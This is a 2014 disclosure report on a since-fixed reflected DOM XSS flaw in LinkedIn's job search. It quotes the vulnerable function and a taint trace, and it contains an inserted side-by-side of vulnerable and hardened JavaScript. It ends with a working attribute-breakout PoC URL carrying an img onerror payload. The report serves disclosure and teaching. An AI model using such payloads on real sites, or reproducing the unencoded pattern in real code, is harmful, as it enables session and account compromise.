Project: DOM XSS Analysis
Edition: 1.6
Last Edit: 05/08/2014
Classification: Not restricted
DOMinatorPro Enterprise
Analysis Report
Website: Linkedin.com
DOM Based XSS: Report
Edition: v1.6 Date: 05/08/2014
Not restricted Page 1/8
Summary
1 INTRODUCTION ... 2
  Disclosure Timeline ... 2
2 KEY FINDINGS ... 3
  HTML Injection and Reflected DOM based XSS ... 3
  2.1.1 Description ... 3
  2.1.2 Exploitation Notes ... 3
  2.1.3 DOMinatorPro Enterprise Automated Tainted Analysis ... 3
  2.1.4 Manual Analysis ... 6
1 Introduction
Minded Security performed an authenticated scan with the DOMinatorPro Enterprise
security scanner to search for JavaScript security issues across the Linkedin.com website.
This report covers the High Risk vulnerabilities found on Linkedin.com.
Minded Security identified the following security issue:
1) Reflected DOM based Cross Site Scripting: an attacker could inject arbitrary HTML
into the browser DOM and execute arbitrary JavaScript in the context of
Linkedin.com.
Disclosure Timeline
08th June 2014 – Vulnerability Found
09th June 2014 – Linkedin.com security team contacted
10th June 2014 – Report with vulnerability details shared
11th June 2014 – Vulnerability confirmed
28th July 2014 – Fix notification received from Linkedin.com. Update: the fix was actually faster than the fix notification; the fix was made in less than ten days.
30th July 2014 – Publication date approved
4th August 2014 – Publication
2 KEY FINDINGS
HTML Injection and Reflected DOM based XSS
2.1.1 Description
This vulnerability occurs when user input is not correctly sanitized and the output is
not encoded. The injection allows the attacker to deliver malicious HTML to a victim.
The targeted browser cannot distinguish the legitimate parts from the malicious
ones and consequently parses and executes all of them as legitimate in the victim's context.
There is a wide range of methods and attributes that can be used to render HTML content.
If these methods are fed untrusted input, there is a high risk of XSS, specifically
HTML injection. Malicious HTML can be injected, for example, via innerHTML, which
is used to render user-supplied HTML code. If the strings are not correctly sanitized,
the problem leads to HTML-injection based XSS.
Another such method is document.write().
2.1.2 Exploitation Notes
When trying to exploit this kind of issue, consider that some characters are treated
differently by different browsers.
For reference see the DOM XSS Wiki:
https://code.google.com/p/domxsswiki/wiki/Introduction
2.1.3 DOMinatorPro Enterprise Automated Tainted Analysis
Vulnerable domain
www.linkedin.com
Affected URL
https://www.linkedin.com/vsearch/j?locationType=Y&f_F=adm&f_E=2,1
Affected JavaScript:
https://static.licdn.com/scds/concat/common/js?h=5gtttrez0fhqk1rrrdqybs6gw-9vzmgtova4p6wyq7dbsmnt1j6-36auq8v5gzcgbgpv5n75nqcpk-2a35w1u9dwchgvetamdi0zt3m-6a6p8n9gugzd0ryn13oa78kxj-62puerwhsridwm57u01qsxtgg-bzhffmu8ocvnlrzhplrxgenzp-56juw5ojwfpz2vfzqy5qdqiz1-e8vdu3l6plnevcvpl03eev99t-d0ck18rz80ts0mwjk68f85n3q-arhs3x17rekxltvfsmdiddwp-4qsv2carv9f6azb28pmyhtnv8-f1y5knzjtcxmj9x8cl51rtufk-6rnrnyvqx3fvi8aj3mn3uv7z8-ey4d2siu9jgxr6p7xukvraecz-1o07mzpiga70g74el55h7xky0-cubycx5zvm3dwhe0o51ze29pk-14uchb6cxkxwro184wj55lgrl-3m0wwwerqvp8618uhx52in5b-c58fihowoh2nty084ompqbnhm-2ypl17s5c3i6apu2k82ewhfxt-8x5be63fehllbdraunzu3eq6z-bi130qzxq4ykvlfxrdyrjrhja-c7v11p9r4wbi4fv9wbm6xiih6-b1qfz41z3b3boi2i3gjuzglmx-3z3pvetds3fbixw0n28vfts1b-2bu8xuljmvyk198nas6fgwc25-7w625ciy82qn8enruyvyr4es-2b6ka2xa7ha23666ep05spxau-f3ibwuwgxet161wu5iic3rqmr
Stack Trace
domify()js?h=b...1cc01dk (line 11508)
b = "<fieldset class="facets...alue="2,1"/></fieldset>"
updateStickyFacets()js?h=5...ic3rqmr (line 2028)
modifyGlobalSearchAction()js?h=5...ic3rqmr (line 2035)
Vulnerable Function Beautified
If the condition is met, all parameters from the query string (location.search) whose names start
with "f_" are read and concatenated into a list of <input> elements inside a <fieldset> HTML tag.
// Vulnerable sink: "f_*" name/value pairs taken from location.search are decoded and
// concatenated into attribute markup, which LI.domify() then parses into DOM nodes.
LI.SearchFacets.Mediator.prototype.updateStickyFacets = function () {
    var b = YDom.get("global-search"),
        g = "",
        d, e, f, c, a;
    if (b && (!this.hasGlobalSearchDropdownChanged &&
        (this.lixStickyFacets === "all" ||
         (this.lixStickyFacets === "jobs" && this.getVerticalType() === "jobs")))) {
        this.removeHiddenInputs(b);
        // Source: every "f_<name>=<value>" pair matched in the query string
        d = this.getQueryString().match(LI.SearchFacets.regex.facetsFromQueryString) || [];
        e = ['<fieldset class="facets">'];
        for (c = 0, a = d.length; c < a; c++) {
            f = d[c].split("=");
            // The decoded value lands inside a quoted attribute without any encoding
            e.push('<input type="hidden" name="' + f[0] + '" value="' +
                   decodeURIComponent(f[1]) + '"/>');
        }
        e.push("</fieldset>");
        // Sink: the string is turned into live DOM nodes
        b.appendChild(LI.domify(e.join("")));
    }
};
String Taint History
location.search
?locationType=Y&f_F=adm&f_E=2,1&keywords=&countryCode=it&orig=JSHP&distance=50&locationType=I
REPLACE
?,locationType=Y&f_F=adm&f_E=2,1&keywords=&countryCode=it&orig=JSHP&distance=50&locationType=I
JOIN
locationType=Y,I&f_F=adm&f_E=2,1&countryCode=it&orig=JSHP&distance=50&rsid=67274011402404052195&openFacets=L,C,F,E
REGEXP
f_E=2,1
SPLIT
2,1
DECODEURICOMPONENT
2,1
CONCAT
<input type="hidden" name="f_E" value="2,1
CONCATLEFT
<input type="hidden" name="f_E" value="2,1"/>
JOIN
<fieldset class="facets"><input type="hidden" name="f_F" value="adm"/><input type="hidden" name="f_E" value="2,1"/></fieldset>
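The source-to-sink chain traced above (REGEXP, SPLIT, DECODEURICOMPONENT, CONCAT, JOIN), reproduced as an added example that is not LinkedIn's or the report's code, next to a hardened rewrite that parses first and attribute-encodes. The facet regex, the f_ name allowlist and the sample query are assumptions, since the report does not show LI.SearchFacets.regex.facetsFromQueryString.

```javascript
// Assumed stand-in for LI.SearchFacets.regex.facetsFromQueryString (not shown
// in the report): picks out every "f_<name>=<value>" pair in the query string.
const FACETS_FROM_QUERY = /f_[^=&]*=[^&]*/g;

// Vulnerable: mirrors the report's REGEXP -> SPLIT -> DECODEURICOMPONENT ->
// CONCAT chain. The decoded value is spliced into a quoted attribute unencoded,
// so a '"' in the value closes the attribute and the remainder becomes markup.
function buildFacetsVulnerable(queryString) {
  const d = queryString.match(FACETS_FROM_QUERY) || [];
  const e = ['<fieldset class="facets">'];
  for (const pair of d) {
    const f = pair.split("=");
    e.push('<input type="hidden" name="' + f[0] + '" value="' +
           decodeURIComponent(f[1]) + '"/>');
  }
  e.push("</fieldset>");
  return e.join("");
}

// Hardened step 1: parse into data with URLSearchParams and allowlist the
// facet names instead of regex-matching raw query text.
function parseFacets(queryString) {
  const facets = [];
  for (const [name, value] of new URLSearchParams(queryString)) {
    if (/^f_[A-Za-z]+$/.test(name)) facets.push({ name, value });
  }
  return facets;
}

// Hardened step 2: when markup must be a string, attribute-encode every
// interpolated value (building elements with createElement is better still).
function escapeAttr(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
function buildFacetsSafe(queryString) {
  const inputs = parseFacets(queryString).map((f) =>
    '<input type="hidden" name="' + escapeAttr(f.name) +
    '" value="' + escapeAttr(f.value) + '"/>');
  return '<fieldset class="facets">' + inputs.join("") + "</fieldset>";
}
// Check a reviewer can run: the fieldset should hold exactly one tag per facet
// plus the fieldset itself; any extra tag means a value broke out of its attribute.
function countTags(html) {
  return (html.match(/<[a-zA-Z]/g) || []).length;
}
// Constructed query: the report's f_F/f_E facets plus an attribute-breakout
// value; a harmless <b> element stands in for the report's payload.
const SAMPLE_QUERY = "?locationType=Y&f_F=adm&f_E=2,1%22/%3E%3Cb%20id%3D%22injected&keywords=";
```

For the report's benign query both builders produce the final JOIN string shown in the taint history; they diverge only once a value carries a quote.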
2.1.4 Manual Analysis
DOMinatorPro Enterprise automation gives complete insight into the vulnerability risk
and the ease of exploitation. To prove the effectiveness of the analysis we added the
following proof of concept, which shows the vulnerability being exploited.
It is also important to point out that this vulnerability can be exploited only if several
requirements are met.
Requirements
The DOM XSS PoC will work if the following requirements are satisfied:
The user must be logged into the Linkedin.com web portal
<!--{"content": "lix_sticky_facets":"jobs"
or <!--{"content": "lix_sticky_facets":"all"
Note: We estimate that 60% of users are vulnerable.
Several users may have "lix_sticky_facets":"control" set, so the PoC would not be
successful for them.
Vulnerability PoC
https://www.linkedin.com/vsearch/j?locationType=Y&f_F=adm&f_E=2,1"/><img/src%3d"err"//onerror%3d"alert(document.domain)&goback=.cjp_*1&trk=cjp_jfunc
The vulnerability is a cross-browser (XBrowser) issue due to the decodeURIComponent(f[1])
function used to decode the parameters from the URL. Therefore this proof of concept
works on most browsers, such as IE, Firefox and Chrome.
Browser Screenshot